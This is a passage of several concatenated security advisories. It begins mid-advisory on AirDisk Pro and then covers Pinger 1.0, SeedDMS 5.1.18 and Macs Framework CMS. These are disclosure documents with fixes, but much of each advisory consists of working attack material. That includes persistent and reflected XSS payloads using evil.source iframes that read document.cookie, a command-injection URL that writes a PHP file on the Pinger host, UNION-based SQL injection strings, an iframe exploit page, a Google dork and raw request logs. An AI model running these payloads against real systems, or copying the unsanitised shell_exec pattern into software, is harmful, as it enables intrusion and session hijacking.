class="e"><a href="#" title="Delete file" onclick="modalPopup("test", 2, 0);"> <img src="/webroot/webdelete.png" width="15" height="15"></a></td></tr><tr class="c"><td class="e"><input type="checkbox" name="selection" value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a href="[MALICIOUS INJECTED SCRIPT CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/"> <img src="/webroot/fileicons/folder.png" width="20" height="20"></a></td><td class="n"> <a href="[MALICIOUS INJECTED SCRIPT CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe src="evil.source"></a></td> <td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td class="k">Folder</td><td class="e"><span style="height:15px; width:15px;">&nbsp;</span></td><td class="e"> <a href="#" title="Rename file" onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS INJECTED SCRIPT CODE!];, 0, 1);"> <img src="/webroot/webrename.png" width="15" height="15"/></a></td><td class="e"> <a href="#" title="Delete file" onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS INJECTED SCRIPT CODE!];, 2, 1);"> <img src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr><tr><td class="e"><input type="checkbox" name="selection" value="Help.webarchive" /></td> <td class="i"><a href="Help.webarchive"><img src="/webroot/fileicons/webarchive.png" width="20" height="20"></a></td><td class="n"> <a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec 2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web Archive</td> <td class="e"><a href="#" title="Download file" onClick="downloadFile("Help.webarchive");"><img src="/webroot/webdownload.png" width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename file" onClick="modalPopup("Help.webarchive", 0, 2);"> <img src="/webroot/webrename.png" width="15" height="15"/></a></td><td class="e"><a href="#" title="Delete file" onClick="modalPopup("Help.webarchive", 2, 2);"><img src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr> </form> </tbody> </table> </div> --- PoC Session logs [POST] --- http://localhost:80/ Host: localhost:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 68 Origin: http://localhost:80 Connection: keep-alive Referer: http://localhost:80/ Upgrade-Insecure-Requests: 1 createFolder=test>"<[MALICIOUS INJECTED SCRIPT CODE!]>&ID=0&submitButton=Create - POST: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 6257 Note: Adding via ftp on mkdir or file is as well possible without authentication on default setup. 2. Delete / Old Popup PoC: Vulnerable Source <div id="modal-content" class="simplemodal-data" style="display: block;"> <div id="modal-title"><h3>Delete File</h3></div> <div id="modal-text"><a>Are you sure you want to delete this file?"test"</a></div> <form name="input" action="" method="post"> <div id="modal-field"><input type="hidden" name="deleteFile" value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT CODE]"></div> <input type="hidden" name="ID" id="ID" value="test"> <input type="submit" name="submitButton" id="submitButton" value="Delete"> </form> </div> --- PoC Session logs [POST] --- http://localhost:80/ Host: localhost:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://localhost:80 Connection: keep-alive Referer: http://localhost:80/evil.source Upgrade-Insecure-Requests: 1 deleteFile=New Folder&ID=New Folder&submitButton=Delete - POST: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 4699 Note: Comes up when somebody tries to delete the malicious injected path. 3. Devicename PoC: Vulnerable Source <div id="headerWraper"> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td><a href="./"><img src="/webroot/webicon.png" id="headerImg" width="57" height="57"/></a></td> <td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td> </tr> </table> </div> --- PoC Session logs [GET] --- http://localhost:80/ Host: localhost:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://localhost:80 Connection: keep-alive Referer: http://localhost:80/evil.source Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 4612 Note: Executes each time the wifi sharing ui service of airdisk pro is opened by the local or remote users. Solution - Fix & Patch: ======================= 1. Disallow special chars in the folder and filenames. Sanitize all inputs and filter all involved parameters to prevent application-side attacks. 2. Parse the output location of the popup permission message content to prevent further executions after injects via post method. 3. Sanitize the devicename displayed on top of the wifi user interaction by a secure parsing mechanism. Security Risk: ============== The security risk of the persistent input validation web vulnerabilities in the application functions are estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Title: Pinger 1.0 - Remote Code Execution # Date: 2020-04-13 # Author: Milad Karimi # Vendor Homepage: https://github.com/wcchandler/pinger # Software Link: https://github.com/wcchandler/pinger # Tested on: windows 10 , firefox # Version: 1.0 # CVE : N/A ================================================================================ Pinger 1.0 - Simple Pinging Webapp Remote Code Execution ================================================================================ # Vendor Homepage: https://github.com/wcchandler/pinger # Software Link: https://github.com/wcchandler/pinger # Date: 2020.04.13 # Author: Milad Karimi # Tested on: windows 10 , firefox # Version: 1.0 # CVE : N/A ================================================================================ # Description: simple, easy to use jQuery frontend to php backend that pings various devices and changes colors from green to red depending on if device is up or down. # PoC : http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php # Vulnerabile code: if(isset($_GET['ping'])){ // if this is ever noticably slower, i'll pass it stuff when called // change the good.xml to config.xml, good is what I use at $WORK $xml = simplexml_load_file("config.xml"); //$xml = simplexml_load_file("good.xml"); if($_GET['ping'] == ""){ $host = "127.0.0.1"; }else{ $host = $_GET['ping']; } $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout .' '.$host.' | grep received | awk \'{print $4}\'')); $id = str_replace('.','_',$host); if(($out == "1") || ($out == "0")){ echo json_encode(array("id"=>"h$id","res"=>"$out")); }else{ ## if it returns nothing, assume network is messed up echo json_encode(array("id"=>"h$id","res"=>"0")); } } if(isset($_GET['socket'])){ $xml = simplexml_load_file("config.xml"); //$xml = simplexml_load_file("good.xml"); if($_GET['socket'] == ""){ $host = "127.0.0.1 80"; }else{ $host = str_replace(':',' ',$_GET['socket']); } $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1'); $id = str_replace('.','_',$host); $id = str_replace(' ','_',$id); if(preg_match("/succeeded/",$out)){ echo json_encode(array("id"=>"h$id","res"=>"1")); }else{ ## if it returns nothing, assume network is messed up echo json_encode(array("id"=>"h$id","res"=>"0")); } } ?>

# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-15 # Vendor: https://www.seeddms.org # Software Link: https://www.seeddms.org/index.php?id=7 # CVE: N/A Document Title: =============== SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2209 Release Date: ============= 2020-04-15 Vulnerability Laboratory ID (VL-ID): ==================================== 2209 Common Vulnerability Scoring System: ==================================== 4.3 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== SeedDMS is a free document management system with an easy to use web based user interface. It is based on PHP and MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of development has made it a mature, powerful and enterprise ready platform for sharing and storing documents. It's fully compatible with its predecessor LetoDMS. (Copy of the Homepage: https://www.seeddms.org/index.php?id=2 & https://www.seeddms.org/index.php?id=7 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application. Affected Product(s): ==================== Uwe Steinmann Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14, v5.1.16, v5.1.18 and v6.0.7 Vulnerability Disclosure Timeline: ================================== 2020-04-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent cross site web vulnerabilities has been discovered in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent cross site scripting web vulnerabilities are located in the `name` and `comment` parameter of the `AddEvent.php` file. Remote attackers are able to add an own event via op.AddEvent with malicious script codes. The request method to inject is POST and the attack vector is located on the application-side. After the inject the execution occurs in the admin panel within the `Log Management` - `Webdav` and `Web` on view. The content of the comment and name is unescaped pushed inside of the logs with a html/js template. Thus allows an attacker to remotly exploit the issue by a simple post inject from outside with lower privileges. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] op.AddEvent (AddEvent.php) Vulnerable Parameter(s): [+] name [+] comment Affected Module(s): [+] Log Management (out.LogManagement.php) Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction. For security demonstration or to reproduce the security web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Start your local webbrowser and tamper the http protocol session 2. Open the AddEvent.php and add a new event 3. Insert your script code test payload inside the Name or Comments path 4. Save or submit the entry with error Note: Now the web and webdav log has captured the insert or erro 5. Now wait until the administrator previews in the log management the web or webdav view function 6. Successful reproduce of the persistent web vulnerability! PoC: Vulnerable Source (Log Management - View) <pre>Apr 13 19:23:22 [info] admin (localhost) op.RemoveLog ?logname=20200413.log Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="<iframe src="evil.source" onload="alert(document.cookie)"></iframe> &comment=<iframe src="evil.source" onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199 </pre> PoC: Payload >"<iframe%20src=evil.source%20onload=alert(document.cookie)></iframe> --- PoC Session Logs (POST) --- https://SeedDMS.localhost:8080/out/out.AddEvent.php Host: SeedDMS.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 - GET: HTTP/1.1 200 OK Server: Apache/2.4.25 (Debian) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2973 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive - https://SeedDMS.localhost:8080/op/op.AddEvent.php Host: SeedDMS.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 356 Origin: https://SeedDMS.localhost:8080 Connection: keep-alive Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 from=2020-04-13&to=2020-04-13 &name=>"<iframe src=evil.source onload=alert(document.cookie)></iframe>&comment=>"<iframe src=evil.source onload=alert(document.cookie)></iframe> - POST: HTTP/1.1 302 Found Server: Apache/2.4.25 (Debian) Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04 Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Note: Injection Point via Calender op.AddEvent Name & Comment --- PoC Session Logs (GET) --- https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log Host: SeedDMS.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Connection: keep-alive Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 - GET: HTTP/1.1 200 OK Server: Apache/2.4.25 (Debian) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 273 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - https://SeedDMS.localhost:8080/out/evil.source Host: SeedDMS.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 302 Found Server: Apache/2.4.25 (Debian) Location: /out/out.ViewFolder.php Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Note: Execution Point via Log Management (AP) on Webdav View or Web View Reference(s): https://SeedDMS.localhost:8080/ https://SeedDMS.localhost:8080/op/op.AddEvent.php https://SeedDMS.localhost:8080/out/out.ViewFolder.php https://SeedDMS.localhost:8080/out/out.AddEvent.php https://SeedDMS.localhost:8080/out/out.LogManagement.php https://SeedDMS.localhost:8080/out/out.Calendar.php?mode= https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname= Solution - Fix & Patch: ======================= 1. Parse and escape the name and comment input field on transmit to sanitize 2. Filter and restrict the input field of the name and comments parameter for special chars to prevent injects 3. Parse the output location of all web and webdav logfiles to prevent the execution point Security Risk: ============== The security risk of the persistent cross site web vulnerabilities in the seeddms web-application are estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-15 # Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download # CVE: N/A Document Title: =============== Macs Framework v1.14f CMS - Multiple Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2206 Release Date: ============= 2020-04-14 Vulnerability Laboratory ID (VL-ID): ==================================== 2206 Common Vulnerability Scoring System: ==================================== 7.4 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management System. It focuses mainly on the Edit In Place editing concept. It comes with a built in blog with moderation support, user manager section, roles manager section, SEO / SEF URL. https://sourceforge.net/projects/macs-framework/files/latest/download (Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Macs Framework v1.1.4f CMS. Affected Product(s): ==================== Macrob7 Product: Macs Framework v1.14f - Content Management System Vulnerability Disclosure Timeline: ================================== 2020-04-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ 1.1 & 1.2 Multiple non-persistent cross site scripting web vulnerabilities has been discovered in the official Mac Framework v1.1.4f Content Managament System. The vulnerability allows remote attackers to manipulate client-side browser to web-applicatio requests to compromise user sesson credentials or to manipulate module content. The first vulnerability is located in the search input field of the search module. Remote attackers are able to inject own malicious script code as search entry to execute the code within the results page that is loaded shortly after the request is performed. The request method to inject is POST and the attack vector is located on the client-side with non-persistent attack vector. The second vulnerability is located in the email input field of the account reset function. Remote attackers are able to inject own malicious script code as email to reset the passwort to execute the code within performed request. The request method to inject is POST and the attack vector is located on the client-side with non-persistent attack vector. Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Parameter(s): [+] searchString [+] emailAdress 1.3 Multiple remote sql-injection web vulnerabilities has been discovered in the official Mac Framework v1.1.4f Content Managament System. The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms or file system of the application. The sql injection vulnerabilities are located in the `roleId` and `userId` of the `editRole` and `deletUser` module. The request method to inject or execute commands is GET and the attack vector is located on the application-side. Attackers with privileged accounts to edit are able to inject own sql queries via roleid and userid on deleteUser or editRole. Multiple unhandled and broken sql queries are visible as default debug to output for users as well. Exploitation of the remote sql injection vulnerability requires no user interaction and a privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] deleteUser [+] editRole Vulnerable Parameter(s): [+] userId [+] roleId Proof of Concept (PoC): ======================= Google Dork(s): intitle, subtitle & co. Site Powered by Mac's PHP MVC Framework Framework of the future Design downloaded from Zeroweb.org: Free website templates, layouts, and tools. 1.1 The non-persistent cross site scripting web vulnerability can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue. PoC: Payload >">"<iframe src=evil.source onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0 PoC: Vulnerable Source <form method="post" action="https://macs-cms.localhost:8080/index.php/search" id="searchForm"> <span class="searchLabel">Search Site:</span><input type="searchString" value="" name="searchString" class="searchString"> <input type="submit" value="Search" class="searchSubmit"> </form><br> <span class="error">No Results found for: "<iframe src="evil.source" onload="alert(document.cookie)"></span> --- PoC Session Logs [POST] --- https://macs-cms.localhost:8080/index.php/search Host: macs-cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 112 Origin: https://macs-cms.localhost:8080 Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= Connection: keep-alive Referer: https://macs-cms.localhost:8080/index.php Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; Upgrade-Insecure-Requests: 1 searchString=>">"<iframe src=evil.source onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0 - POST: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Content-Length: 9865 1.2 The non-persistent cross site scripting web vulnerability can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue. PoC: Exploitation test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com PoC: Vulnerable Source <form method="post" action="https://macs-cms.localhost:8080/index.php/main/cms/login" class="ajax" ajaxoutput="#loginMessage"> <table style="width:100%"> <tbody><tr> <td style="width: 20px">Username:</td> <td><input type="text" name="username"></td> </tr> <tr> <td>Password:</td> <td><input type="password" name="password"></td> </tr> <tr> <td colspan="2"><input type="submit" value="Login"></td> </tr> <tr> <td colspan="2"><br><div id="loginMessage" style="display: block;">Invalid Username or Password</div></td> </tr> </tbody></table> <br> <a href="https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword" class="ajax" ajaxoutput="#forgotPassword">Forgot Password</a> <input type="hidden" name="scrollPosition" value="102"></form> <div id="forgotPassword" style="display: block;"> <form class="ajax" method="post" action="https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess" ajaxoutput="#forgotPasswordReturn"> Enter your email address: <input type="text" name="emailAddress"><br> <input type="submit" value="Send Email"> </form> <br> <div id="forgotPasswordReturn" style="display: block;">Cannot find user with Email address: test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com</iframe></div> </div> --- PoC Session Logs [POST] --- https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword Host: macs-cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 17 Origin: https://macs-cms.localhost:8080 Connection: keep-alive Referer: https://macs-cms.localhost:8080/index.php/main/cms/login Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; ajaxRequest=true - POST: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Content-Length: 335 - https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess Host: macs-cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 123 Origin: https://macs-cms.localhost:8080 Connection: keep-alive Referer: https://macs-cms.localhost:8080/index.php/main/cms/login Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; ajaxRequest=true&=&emailAddress=test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com - POST: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=ISO-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Content-Length: 105 1.3 The remote sql injection web vulnerability can be exploited by remote attackers with privileged application user account and without user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue. PoC: Payload %27-1%20order%20by%205-- %27-1%20union select 1,2,3,4,@@version-- PoC: Exploitation <html> <head><body><title>Mac's CMS SQL Injection PoC</title> <iframe src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20order%20by%205--%20> <iframe src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20union select 1,2,3,4,@@version--%20> <iframe src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20order%20by%205--%20> <iframe src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20union select 1,2,3,4,@@version--%20> </body></head> </html> --- PoC Session Logs [GET] --- https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId='-1 order by 5-- Host: macs-cms.localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: __utma=72517782.1164807459.1586620290.1586620290.1586620290.1; Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Content-Length: 53 --- [SQL Error Exception Logs] --- SQLSTATE[HY000]: General error: 1 near "1": syntax error - Error executing SQL statement SQLSTATE[HY000]: General error: 1 unrecognized token: "''';" - Error executing SQL statement SQLSTATE[HY000]: General error: 1 1st ORDER BY term out of range - should be between 1 and 5 - 5.0.12 'pwnd This page was created in 1.5665068626404 seconds Security Risk: ============== 1.1 & 1.2 the security risk of the client-side cross site scripting web vulnerabilities in the search and email reset function are estimated as medium. 1.3 The security risk of the remote sql injection web vulnerabilities in the id parameters on delete are estimated as high. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team 